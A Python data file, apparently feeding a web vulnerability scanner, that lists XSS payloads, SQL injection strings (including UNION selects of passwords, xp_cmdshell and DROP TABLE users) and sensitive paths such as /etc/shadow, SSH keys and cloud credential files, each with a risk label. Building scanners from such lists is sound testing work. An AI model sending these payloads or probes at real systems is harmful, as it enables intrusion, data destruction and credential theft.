# payloads.py

# XSS Payloads with structured format
XSS_PAYLOADS = [
    {"payload": "<script>alert('XSS')</script>", "risk": "high"},
    {"payload": "<img src='x' onerror='alert(1)'>", "risk": "high"},
    {"payload": "<svg/onload=alert('XSS')>", "risk": "high"},
    {"payload": "<body onload=alert(1)>", "risk": "high"},
    {"payload": "<iframe id=x onblur=alert(1)></iframe><input autofocus>", "risk": "medium"},
    {"payload": "<input onblur=alert(1) id=x><input autofocus>", "risk": "medium"},
    {"payload": "<textarea onblur=alert(1) id=x></textarea><input autofocus>", "risk": "medium"},
    {"payload": "<select onblur=alert(1) id=x></select><input autofocus>", "risk": "medium"},
    {"payload": "<p><script>/* Bad stuff here... */</script></p>", "risk": "high"},
    {"payload": "<p>This post was extremely helpful.</p>", "risk": "low"},
    {"payload": "<a autofocus onfocus=alert(1) href></a>", "risk": "medium"},
    {"payload": "<a autofocus onfocusin=alert(1) href></a>", "risk": "medium"},
    {"payload": "<a id=x tabindex=1 onfocus=alert(1)></a>", "risk": "medium"},
    {"payload": "<a id=x tabindex=1 onfocusin=alert(1)></a>", "risk": "medium"},
    {"payload": "<a onafterscriptexecute=alert(1)><script>1</script>", "risk": "high"},
    {"payload": "<a onbeforecopy=\"alert(1)\" contenteditable>test</a>", "risk": "medium"},
    {"payload": "<img src=x onerror=&#x61;&#x6C;&#x65;&#x72;&#x74;(1)>", "risk": "high"},
    {"payload": "<iframe srcdoc=\"<script>alert('XSS')</script>\"></iframe>", "risk": "high"},
    {"payload": "<details open ontoggle=alert(1)></details>", "risk": "high"},
    {"payload": "<video><source onerror=\"alert(1)\"></video>", "risk": "high"},
    {"payload": "<<script>><<alert>(1)//<</script>>", "risk": "high"},
    {"payload": "<input type='text' name='username'>", "risk": "low"},
    {"payload": "<div class='message'>Welcome back!</div>", "risk": "low"},
    {"payload": "<a href='https://example.com'>Click here</a>", "risk": "low"},
    {"payload": "<img src='logo.png' alt='Logo'>", "risk": "low"},
    {"payload": "<strong>This is bold text</strong>", "risk": "low"},
    {"payload": "<em>Italic text</em>", "risk": "low"},
    {"payload": "<script>console.log('hello')</script>", "risk": "low"},
    {"payload": "<ul><li>Item 1</li><li>Item 2</li></ul>", "risk": "low"},
    {"payload": "<button type='submit'>Submit</button>", "risk": "low"},
    {"payload": "<svg><animate onbegin=alert(1) attributeName=x dur=1s>", "risk": "high"},
    {"payload": "<iframe src='javascript:alert(1)'></iframe>", "risk": "high"},
    {"payload": "<script>eval(String.fromCharCode(88,83,83))</script>", "risk": "high"},
    {"payload": "<img src=x onerror=alert(1)>", "risk": "high"},
    {"payload": "<img src=x onerror=eval('alert(1)')>", "risk": "high"},
    {"payload": "<script>eval('alert(1)')</script>", "risk": "high"},
    {"payload": "<script>window.onload=alert(1)</script>", "risk": "high"},
    {"payload": "<a href='javascript:alert(1)'>Click Here</a>", "risk": "medium"},
    {"payload": "<button onfocus='alert(1)'>Click Me</button>", "risk": "medium"},
    {"payload": "<textarea onfocus='alert(1)'></textarea>", "risk": "medium"},
    {"payload": "<a onmouseover='alert(1)'>Hover Me</a>", "risk": "medium"},
    {"payload": "<svg onload='alert(1)'></svg>", "risk": "high"},
    {"payload": "<input type='image' src='x' onerror='alert(1)'>", "risk": "high"},
    {"payload": "<form onsubmit='alert(1)'><input type='submit'></form>", "risk": "low"},
    {"payload": "<img src=x oNerror=alert(1)>", "risk": "high"},
    {"payload": "<img \"\"\"><script>alert(1)</script>", "risk": "high"},
    {"payload": "<script>alert`1`</script>", "risk": "high"},
    {"payload": "<script>throw onerror=alert;'XSS'</script>", "risk": "high"},
    {"payload": "<style><img src='x' onerror='alert(1)'></style>", "risk": "high"},
    {"payload": "<input type='search' onsearch='alert(1)'>", "risk": "medium"},
    {"payload": "<marquee onstart='alert(1)'>Hello</marquee>", "risk": "medium"},
    {"payload": "<select onchange='alert(1)'><option>Test</option></select>", "risk": "medium"},
    {"payload": "<details open ontoggle='alert(1)'></details>", "risk": "high"},
    {"payload": "<body onunload='alert(1)'>", "risk": "high"},
    {"payload": "<iframe onload='alert(1)'></iframe>", "risk": "high"},
    {"payload": "javascript:alert('XSS')", "risk": "low"},
    {"payload": "&lt;script&gt;alert('XSS')&lt;/script&gt;", "risk": "low"},
    {"payload": "<p><strong>Not sanitized</strong></p>", "risk": "low"},
    {"payload": "<img src='x' alt='XSS'>", "risk": "low"},
    {"payload": "<b onmousedown=alert('XSS')>Click</b>", "risk": "low"},
    {"payload": "'><img src=x onerror=alert('XSS')>", "risk": "high"},
    {"payload": "<iframe src='javascript:alert(\"XSS\")'></iframe>", "risk": "high"},
    {"payload": "<body onload=alert('XSS')>", "risk": "high"}
]





# SQL Injection Payloads with risk levels
SQLI_PAYLOADS = [
    {"payload": "' OR '1'='1", "risk": "high"},
    {"payload": "' OR '1'='1' -- ", "risk": "high"},
    {"payload": "' OR 1=1 -- ", "risk": "high"},
    {"payload": "' OR 1=1#", "risk": "high"},
    {"payload": "' OR 1=1/*", "risk": "high"},
    {"payload": "' OR '1'='1' /*", "risk": "high"},
    {"payload": "' OR ''='", "risk": "high"},
    {"payload": "' OR 1=1 LIMIT 1; -- ", "risk": "high"},
    {"payload": "' UNION SELECT NULL, NULL, NULL -- ", "risk": "high"},
    {"payload": "' UNION SELECT username, password FROM users -- ", "risk": "high"},
    {"payload": "admin' -- ", "risk": "high"},
    {"payload": "admin' #", "risk": "high"},
    {"payload": "admin'/*", "risk": "high"},
    {"payload": "' OR 1=1 ORDER BY 1 -- ", "risk": "high"},
    {"payload": "' OR EXISTS(SELECT * FROM users) -- ", "risk": "high"},
    {"payload": "' AND 1=1 -- ", "risk": "medium"},
    {"payload": "' AND 1=2 -- ", "risk": "medium"},
    {"payload": "' AND username IS NOT NULL; -- ", "risk": "medium"},
    {"payload": "' AND (SELECT COUNT(*) FROM users) > 0 -- ", "risk": "medium"},
    {"payload": "1' AND SLEEP(5) -- ", "risk": "high"},
    {"payload": "1 AND 1=1", "risk": "low"},
    {"payload": "1 AND 1=2", "risk": "low"},
    {"payload": "admin' AND 1=1 -- ", "risk": "low"},
    {"payload": "admin' AND 1=2 -- ", "risk": "low"},
    {"payload": "'; EXEC xp_cmdshell('dir'); -- ", "risk": "high"},
    {"payload": "' OR '1'='1' AND ''='", "risk": "high"},
    {"payload": "' AND (SELECT SUBSTRING(@@version,1,1)) = '5", "risk": "medium"},
    {"payload": "' AND ASCII(SUBSTRING((SELECT @@version),1,1))=53 -- ", "risk": "medium"},
    {"payload": "' OR 1=CONVERT(int, 'test') -- ", "risk": "high"},
    {"payload": "' OR 1=1; DROP TABLE users -- ", "risk": "high"},
    {"payload": "1'; DROP TABLE users --", "risk": "high"},
    {"payload": "1 OR 1=1", "risk": "high"},
    {"payload": "1 OR 1=1#", "risk": "high"},
    {"payload": "1 OR 1=1--", "risk": "high"},
    {"payload": "' OR 'x'='x", "risk": "high"},
    {"payload": "OR 1=1", "risk": "high"},
    {"payload": "\" OR \"\" = \"", "risk": "high"},
    {"payload": "x' OR 1=1 --", "risk": "high"},
    {"payload": "x' OR 1=1#", "risk": "high"},
    {"payload": "x' OR 1=1/*", "risk": "high"},
    {"payload": "' OR sleep(10)--", "risk": "high"},
    {"payload": "' OR benchmark(1000000,MD5(1))--", "risk": "high"},
    {"payload": "'||(SELECT password FROM users LIMIT 1)||'", "risk": "high"},
    {"payload": "';WAITFOR DELAY '0:0:10'--", "risk": "high"},
    {"payload": "' AND 1=CAST((CHR(113)||CHR(107)||CHR(113)||CHR(106)||CHR(113)) AS NUMERIC)--", "risk": "high"},
    {"payload": "' AND (SELECT COUNT(*) FROM users) > 0 -- ", "risk": "medium"},
    {"payload": "admin' OR '1'='1'--", "risk": "high"},
    {"payload": "' UNION SELECT 1,2,3--", "risk": "high"},
    {"payload": "' UNION SELECT null, username, password FROM users--", "risk": "high"},
    {"payload": "' AND '1'='1", "risk": "medium"}
]



# Sensitive File Paths with risk levels
SENSITIVE_FILES = [
    {"payload": "/.git/", "risk": "high"},
    {"payload": "/.env", "risk": "high"},
    {"payload": "/config.php", "risk": "high"},
    {"payload": "/wp-config.php", "risk": "high"},
    {"payload": "/database.yml", "risk": "high"},
    {"payload": "/admin/", "risk": "medium"},
    {"payload": "/backup/", "risk": "medium"},
    {"payload": "/logs/", "risk": "medium"},
    {"payload": "/.htaccess", "risk": "high"},
    {"payload": "/.htpasswd", "risk": "high"},
    {"payload": "/phpinfo.php", "risk": "high"},
    {"payload": "/.DS_Store", "risk": "low"},
    {"payload": "/web.config", "risk": "high"},
    {"payload": "/credentials.json", "risk": "high"},
    {"payload": "/secrets.json", "risk": "high"},
    {"payload": "/private_key.pem", "risk": "high"},
    {"payload": "/devconfig.ini", "risk": "medium"},
    {"payload": "/test.php", "risk": "medium"},
    {"payload": "/config.ini", "risk": "medium"},
    {"payload": "/old_version/", "risk": "low"},
    {"payload": "/dump.sql", "risk": "high"},
    {"payload": "/database.sql", "risk": "high"},
    {"payload": "/backup.sql", "risk": "high"},
    {"payload": "/public/.git", "risk": "high"},
    {"payload": "/uploads/testfile.pdf", "risk": "medium"},
    {"payload": "/home/user/.ssh/id_rsa", "risk": "high"},
    {"payload": "/etc/passwd", "risk": "high"},
    {"payload": "/etc/shadow", "risk": "high"},
    {"payload": "/etc/hostname", "risk": "medium"},
    {"payload": "/etc/hosts", "risk": "medium"},
    {"payload": "/.git/refs/heads/master", "risk": "high"},
    {"payload": "/backup/latest.tar.gz", "risk": "high"},
    {"payload": "/tmp/testfile.sql", "risk": "medium"},
    {"payload": "/public_html/.git/", "risk": "high"},
    {"payload": "/admin/.env", "risk": "high"},
    {"payload": "/home/user/.aws/credentials", "risk": "high"},
    {"payload": "/root/.ssh/id_rsa", "risk": "high"},
    {"payload": "/var/log/auth.log", "risk": "high"},
    {"payload": "/var/log/apache2/error.log", "risk": "high"},
    {"payload": "/var/www/html/.git/", "risk": "high"},
    {"payload": "/var/www/.git/", "risk": "high"},
    {"payload": "/.gitmodules", "risk": "high"},
    {"payload": "/etc/mysql/my.cnf", "risk": "high"},
    {"payload": "/etc/mysql/mysql.conf.d/mysqld.cnf", "risk": "high"},
    {"payload": "/usr/share/bugtracker/.git/HEAD", "risk": "high"},
    {"payload": "/.vscode/settings.json", "risk": "medium"},
    {"payload": "/etc/ssl/private/server.key", "risk": "high"},
    {"payload": "/tmp/secret.key", "risk": "high"},
    {"payload": "/config/secrets.yml", "risk": "high"},
    {"payload": "/etc/ssh/sshd_config", "risk": "high"},
    {"payload": "/var/backups/database_backup.sql", "risk": "high"},
    {"payload": "/.bash_history", "risk": "high"},
    {"payload": "/home/user/.bash_history", "risk": "medium"},
    {"payload": "/.terraform/environment.tfvars", "risk": "high"},
    {"payload": "/var/www/.env", "risk": "high"},
    {"payload": "/home/user/.docker/config.json", "risk": "high"},
    {"payload": "/config/.env", "risk": "high"},
    {"payload": "/.idea/workspace.xml", "risk": "medium"},
    {"payload": "/docker-compose.yml", "risk": "medium"},
    {"payload": "/composer.lock", "risk": "medium"},
    {"payload": "/yarn.lock", "risk": "low"},
    {"payload": "/api/.git/", "risk": "high"},
    {"payload": "/mobile/.git/", "risk": "high"},
    {"payload": "/files/.git/", "risk": "high"},
    {"payload": "/assets/.git/", "risk": "high"},
    {"payload": "/cache/", "risk": "medium"},
    {"payload": "/temp/", "risk": "medium"},
    {"payload": "/tmp/", "risk": "medium"},
    {"payload": "/sessions/", "risk": "medium"},
    {"payload": "/gulpfile.js", "risk": "medium"},
    {"payload": "/webpack.config.js", "risk": "medium"},
    {"payload": "/package.json", "risk": "medium"},
    {"payload": "/bower.json", "risk": "medium"},
    {"payload": "/manifest.json", "risk": "medium"},
    {"payload": "/security.txt", "risk": "low"},
    {"payload": "/.well-known/security.txt", "risk": "low"},
    {"payload": "/CHANGELOG.md", "risk": "low"},
    {"payload": "/README.md", "risk": "low"},
    {"payload": "/LICENSE", "risk": "low"},
    {"payload": "/COPYING", "risk": "low"},
    {"payload": "/robots.txt", "risk": "low"}

]
